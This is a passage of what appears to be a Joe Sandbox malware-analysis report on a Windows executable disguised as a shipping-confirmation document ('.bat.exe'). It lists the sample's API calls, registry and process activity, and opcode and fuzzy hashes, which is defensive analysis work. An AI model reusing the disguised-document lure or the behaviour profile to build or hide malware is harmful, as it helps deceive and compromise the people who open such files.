                                                                            • Opcode ID: 06ef8f5a1822f0b757ae31e3b83f809751af444a1e9c2dfe7d230d3dce02f925
                                                                            • Instruction ID: 33b9de73c5357426475d1ecb6718d507a7f793f52192090568aa5f1be2fe3f26
                                                                            • Opcode Fuzzy Hash: 06ef8f5a1822f0b757ae31e3b83f809751af444a1e9c2dfe7d230d3dce02f925
                                                                            • Instruction Fuzzy Hash: D8714671E04228CBDF28CF98C8847ADBBB1FF44305F15856AD856BB281C7786986DF45
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cfd14bdf320e39a62d2c2df30edf7cb1e1c63a24431ff8987f761f3d68dc011c
                                                                            • Instruction ID: eebb37c65e2131d6119e05978ba22ffeb7e1a1a57c5d17d20a151e235b5fbeda
                                                                            • Opcode Fuzzy Hash: cfd14bdf320e39a62d2c2df30edf7cb1e1c63a24431ff8987f761f3d68dc011c
                                                                            • Instruction Fuzzy Hash: DD714771E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7786A86DF45
                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402108
                                                                              • Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                                              • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                                              • Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                                              • Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                                              • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                                              • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                                              • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402119
                                                                            • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402196
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                            • String ID:
                                                                            • API String ID: 334405425-0
                                                                            • Opcode ID: cd3871a4674ab2d20781c98e55c83c75f0414bc3aa5ab025748cc012411ec63e
                                                                            • Instruction ID: d5d67dfdf4745362115819af7549d82072a8f7f049e0964222285d8f4f4a232d
                                                                            • Opcode Fuzzy Hash: cd3871a4674ab2d20781c98e55c83c75f0414bc3aa5ab025748cc012411ec63e
                                                                            • Instruction Fuzzy Hash: ED215031904108EADF11AFA5CE49A9E7A71FF44359F20413BF201B91E1CBBD8982AA5D
                                                                            APIs
                                                                            • GlobalFree.KERNEL32(006E29C8), ref: 00401C10
                                                                            • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C22
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocFree
                                                                            • String ID: Call
                                                                            • API String ID: 3394109436-1824292864
                                                                            • Opcode ID: 1123cc6a0f383144ca4e0a98b12c217c63afdee534dd3928be857bb34d6716f0
                                                                            • Instruction ID: 755843c12eef3f61fe3821796784c52372e38f60d99e915cd62482290075d307
                                                                            • Opcode Fuzzy Hash: 1123cc6a0f383144ca4e0a98b12c217c63afdee534dd3928be857bb34d6716f0
                                                                            • Instruction Fuzzy Hash: 7D210872904254DBDB20FBA4CE84A5E73B8AB04718715093FF542F32D0C6B89C418BDD
                                                                            APIs
                                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D6
                                                                            • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E9
                                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,00000000,00000011,00000002), ref: 00402602
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: Enum$CloseValue
                                                                            • String ID:
                                                                            • API String ID: 397863658-0
                                                                            • Opcode ID: 0dba00214060772b269aec70c88b8c4dcefe1b236ecbe69e4432b09e807f707b
                                                                            • Instruction ID: 0e7c906900fe31acaf330cad7c7adc7318663c551a7f251ed3955534a0ac5e15
                                                                            • Opcode Fuzzy Hash: 0dba00214060772b269aec70c88b8c4dcefe1b236ecbe69e4432b09e807f707b
                                                                            • Instruction Fuzzy Hash: 3D017171904205ABEB149F949E58AAF7678FF40308F10443EF505B61C0DBB84E41976D
                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(00008001,00000000,00000000,00000000,00000000,?,?,00403322,000000FF,00000000,00000000,00008001,?), ref: 0040339B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointer
                                                                            • String ID:
                                                                            • API String ID: 973152223-0
                                                                            • Opcode ID: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
                                                                            • Instruction ID: 810e563441ec60ddb2e304251acab09d4dc6a46a8481b8ea59e7f14a092257d1
                                                                            • Opcode Fuzzy Hash: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
                                                                            • Instruction Fuzzy Hash: E231B170200209BFDB129F59DD44E9A3FA9EB04355F10843AF904EA191D3788E51DBA9
                                                                            APIs
                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                            • SendMessageW.USER32(0040A230,00000402,00000000), ref: 004013F4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
                                                                            • Instruction ID: 4cdfa14fa51073ec67c7732ce5b449902c092ffb61bdcee16cd85da0f6320b18
                                                                            • Opcode Fuzzy Hash: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
                                                                            • Instruction Fuzzy Hash: 0F01F4327212209BE7295B389D05B6B3698E710354F10863FF855F6AF1DA78CC429B4C
                                                                            APIs
                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040245B
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402464
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: CloseDeleteValue
                                                                            • String ID:
                                                                            • API String ID: 2831762973-0
                                                                            • Opcode ID: bb53019bc6b0262c1a7ba30a0e76d60d513ae05c0bd0953298f21ea634c4095c
                                                                            • Instruction ID: 5f3bbf62c25f8db8e4007b741f5cecc6338069a28fa7be666feaa9c5da8c1564
                                                                            • Opcode Fuzzy Hash: bb53019bc6b0262c1a7ba30a0e76d60d513ae05c0bd0953298f21ea634c4095c
                                                                            • Instruction Fuzzy Hash: FCF06232A04520ABDB10BBA89A8DAEE62A5AF54314F11443FE542B71C1CAFC4D02976D
                                                                            APIs
                                                                            • CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405C18
                                                                            • GetLastError.KERNEL32 ref: 00405C26
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast
                                                                            • String ID:
                                                                            • API String ID: 1375471231-0
                                                                            • Opcode ID: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                                            • Instruction ID: c951f985784cdd1ce4bfd292213bf749a6eab04c72170860fc3503b4537cd402
                                                                            • Opcode Fuzzy Hash: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                                            • Instruction Fuzzy Hash: 67F0F4B0C04209DAEB00CFA4D9487EFBBB4FB04309F00842AD541B6281DBB882488BA9
                                                                            APIs
                                                                            • CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
                                                                            • CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcess
                                                                            • String ID:
                                                                            • API String ID: 3712363035-0
                                                                            • Opcode ID: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
                                                                            • Instruction ID: 40cf053be3b9956ee682ea3cdb0c0f8171e7446c395677da6238e6dd92eb787c
                                                                            • Opcode Fuzzy Hash: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
                                                                            • Instruction Fuzzy Hash: A4E0BFB4600219BFFB109B64EE49F7B7B7CEB00648F418425BD14F2551D77498149A7C
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403755,0000000C,?,?,?,?,?,?,?,?), ref: 00406A88
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406AA3
                                                                              • Part of subcall function 00406A06: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A1D
                                                                              • Part of subcall function 00406A06: wsprintfW.USER32 ref: 00406A58
                                                                              • Part of subcall function 00406A06: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A6C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                            • String ID:
                                                                            • API String ID: 2547128583-0
                                                                            • Opcode ID: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
                                                                            • Instruction ID: b294046d3e4dddd9dd595f306a5883e4a37f4b9faaa0bea25d2c73fe5553ab8f
                                                                            • Opcode Fuzzy Hash: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
                                                                            • Instruction Fuzzy Hash: DFE08636704610AAD610BA709E48C6773A89F86710302C83FF546F6140D738DC32AA79
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(00000003,00403118,C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe,80000000,00000003), ref: 00406176
                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406198
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesCreate
                                                                            • String ID:
                                                                            • API String ID: 415043291-0
                                                                            • Opcode ID: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                                            • Instruction ID: be52236ca1bfc2e7009fe271a1dfd41440a2a0d1ebc26b2cb4c8630358080456
                                                                            • Opcode Fuzzy Hash: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                                            • Instruction Fuzzy Hash: 30D09E31254301EFFF098F20DE16F2EBAA2EB94B00F11952CB682941E0DA715819DB15
                                                                            APIs
                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405C36
                                                                            • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405C44
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast
                                                                            • String ID:
                                                                            • API String ID: 1375471231-0
                                                                            • Opcode ID: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                                            • Instruction ID: 9ee767d7bb24d12ef4013e29ffdbd8bf560f6e5ed3fd997729cc5c4a92c9c995
                                                                            • Opcode Fuzzy Hash: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                                            • Instruction Fuzzy Hash: 4EC08C30208601DAEA040B30DE08F073A50BB00340F214439A082E40A4CA308004CD2D
                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028B4
                                                                              • Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointerwsprintf
                                                                            • String ID:
                                                                            • API String ID: 327478801-0
                                                                            • Opcode ID: be6f6e28811eff9f61e37437ffce11e37693180493ed76b7cb4b0af79cd2cf68
                                                                            • Instruction ID: a9a910f18d9475f192186a99a32baa3f0737176f8f71227260f04108cb8f5765
